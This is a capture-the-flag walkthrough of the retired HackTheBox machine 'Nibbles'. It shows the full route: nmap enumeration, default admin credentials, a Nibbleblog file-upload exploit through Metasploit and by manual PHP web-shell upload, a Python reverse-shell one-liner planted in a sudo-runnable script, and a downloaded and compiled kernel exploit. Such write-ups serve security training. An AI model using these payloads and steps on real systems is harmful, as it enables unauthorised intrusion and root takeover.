Nibbles HackTheBox WalkThrough
This is Nibbles HackTheBox machine walkthrough and is also the
15th machine of our
OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to
Nibbles HTB machine in two different ways. One using
metasploit and other
without metasploit. Before starting let us know something about this machine. It is a
Linux box with IP address
10.10.10.75 and difficulty
easy assigned by its maker.
This machine is currently
retired so you will require
VIP subscription at
hackthebox.eu to access this machine. First of all, connect your PC with
HackTheBox VPN and make sure your connectivity with
Nibbles machine by pinging IP 10.10.10.75. If all goes correct then start hacking. As usual, I started by scanning the machine. Used
Nmap [a port scanner] for this task and the result is below-
$ nmap -sC -sV -oN Nibbles.nmap 10.10.10.75
Nmap revealed two ports as open.
OpenSSH is running on port
apache2 webserver is running over port
80. Since port 80 is open so we should have some website running over it and the website can be accessed at URL http://10.10.10.75. Ongoing to this website found a
blank page containing two words
Hello World! and nothing is present on this page. As usual, I checked the
page source for some
hint in the
section and luckily this time found some interesting comment. The comment contains URI of this website which is
Now, we have a new URL to explore over, viz. http://10.10.10.75/nibbleblog/. This URL has
nibbleblog CMS installed to it. When I get any
CMS then my next step is to check whether the CMS is
open source or
closed source, its
number and then search for available vulnerability and its exploit on
searchsploit. If it is open source CMS then we can simply get its source code at
GitHub and check its directory structure as well as file & folder names. This prevents us from
files & folders on our target website. We can also search for the particular file at the website which we see on
googling revealed that it is an
open source CMS and its source code is present at GitHub. After some further enumeration got version of this CMS a https://10.10.10.75/nibbleblog/update.php.
So we have
Nibbleblog v4.0.3. Now we can simply search for available exploits for this version through
searchsploit (tool to query exploit-db).
Searching for available exploit
$ searchsploit nibbleblog 4.0.3
Searchsploit revealed that this version is effected with
Arbitrary File Upload and there is also a
metasploit module available for this exploit. Let us check the requirement for this module and exploit this vulnerability using metasploit.
$ sudo msfdb run
msf6 > search nibbleblog
mdf6 > info use exploit/multi/http/nibbleblog_file_upload
The metasploit module is
exploit/multi/http/nibbleblog_file_upload. This module requires
password to work. But we don’t have any credentials enumerated so far. Since this is a CMS just like we have WordPress so there should also be a
login panel that is used to manage this website. After some more enumeration got
login panel at http://10.10.10.75/nibbleblog/admin.php. Tried some default credentials like
nibbles and luckily
nibbles worked. So we have got the credential of admin user. Now we can exploit this vulnerability using metasploit to gain access to nibbles box. I exploited this vulnerability in two different ways. First through
metasploit and second
without metasploit. Let us get user shell using metasploit.
Getting User Shell Using Metasploit – Method 1
msf6 > use exploit/multi/http/nibbleblog_file_upload
msf6 exploit(multi/http/nibbleblog_file_upload) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.14.3
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > exploit
We have got user shell using metasploit. Let us exploit this vulnerability without metasploit. You can get more information about this vulnerability and its PoC from here. According to this file upload vulnerability an attacker can upload any malicious script using
My image plugin and can execute it because any file uploaded through
My Image plugin saves it as its original extension. Check this snippet from
Getting User Shell Without Metasploit – Method 2
To get user shell do the following things.
1. Log in into
admin panel at http://10.10.10.75/nibbleblog/admin.php using the credential
2. Click on
Plugins on left pane and click on
My Image plugin name.
php-reverse-shell.php and click on
Save changes to apply the changes. Php webshell can be found in the directory
/usr/share/webshells/php/. Don’t forget to replace the
IP address of shell by your
tun0 IP before uploading.
4. Start netcat listener on kali machine to accept the reverse connection from this php shell.
5. Access URL http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php to execute the shell. That’s all, you will have a shell now.
1. Login into
2. Click on
plugins and then
3. Upload the shell.
4. Start netcat listener
$ nc -nvlp 8888
5. Execute the uploaded shell
$ curl http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
6. Check the user and its ID after getting shell.
$ whoami && id
We have got a
user shell. Let us
upgrade it to fully qualified
Linux shell so that we can run more advanced
Linux command through it.
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
$ ^Z #Press CTRL+Z to background the shell
$ stty raw -echo
$ fg # And press two times enter to foreground the shell
Capture User Flag
escalate privilege to root we have to first find a
privilege escalation vector using which we can escalate privilege. There are
two ways by which you can find privilege escalation vector. Either use some post exploitation enumeration scripts like Linpeas, LinEnum, linux-exploit-suggester, etc. or perform enumeration manually.
Finding PrivEsc Vector
sudo -l command revealed that user
nibbler can run
root user, which means that any command that requires root privilege to execute if put inside the script
monitor.sh can be executed by user nibbler
without asking password. Suppose if we are putting some command like
$ sudo python3 inside this file then if we run this script as
root user it won’t ask for password.
$ sudo -l
monitor.sh file is present inside the
personal.zip folder. So we have to unzip
personal.zip to execute
monitor.sh script. If you don’t want to
unzip this folder you can simply create another
monitor.sh file inside directory
personal/stuff/. But you have to create
stuff folder also because they are not previously present. I am going to use the same
monitor.sh which I got after unzipping
$ unzip personal.zip
monitor.sh script can be
executed by user
nibbler because it has
$ find . -ls
nibbler can modify this file so he can also put some
reverse shell code into this file and if this file will be run as
root then the reverse shell code will also be executed as root and we can get shell on our
netcat listener. I did the same things and got
root shell. So here our privilege escalation vector is getting root by
Sudo Right Exploitation.
This box is also vulnerable to
kernel exploit which I came to know when I ran linux-exploit-suggester to find some privilege escalation vector. For more information about this kernel exploit check CVE-2017-16995. So we have also two ways to root this box and that’s what we are going to do the very next. First by using
Sudo Right Exploitation and second by using
Getting Root Shell via Sudo Right Exploitation – Method 1
To get root shell I did the following things.
On Kali Machine
1. Started netcat listener.
$ nc -nvlp 1234
On Nibbles Machine
2. Changed the directory to
personal/stuff/ [Make sure you have already extracted the folder personal.zip or have created the file monitor.sh]
3. Put the following reverse shell code into
sudo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
4. Execute the script as root. Ignore the connection time-out error.
$ cd personal/stuff/
$ nano monitor.sh
$ grep -i "sudo python3" monitor.sh
$ sudo -u root ./monitor.sh
We are root now.
Getting Root Shell via Kernel Exploit – Method 2
To get root shell via Kernel Exploit I did the following things.
On Kali Machine
1. Downloaded the exploit from exploit-db.
2. Started python http server to host this file
$ curl https://www.exploit-db.com/download/45010 -o exploit.c
$ sudo python3 -m http.server 80
On Nibbles Machine
4. Changed the directory to public writable directory viz.,
5. Downloaded the exploit from my kali machine
6. Compiled the exploit
7. Finally run it.
$ cd /dev/shm
$ wget http://10.10.14.3/exploit.c
$ gcc exploit.c
We have successfully got root. Let us capture root flag.
Capture Root Flag
# cat /root/root.txt
This was how I rooted to the Nibbles HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. Share your experience in the comment section. For any query and suggestion about the writeup feel free to write us at [email protected].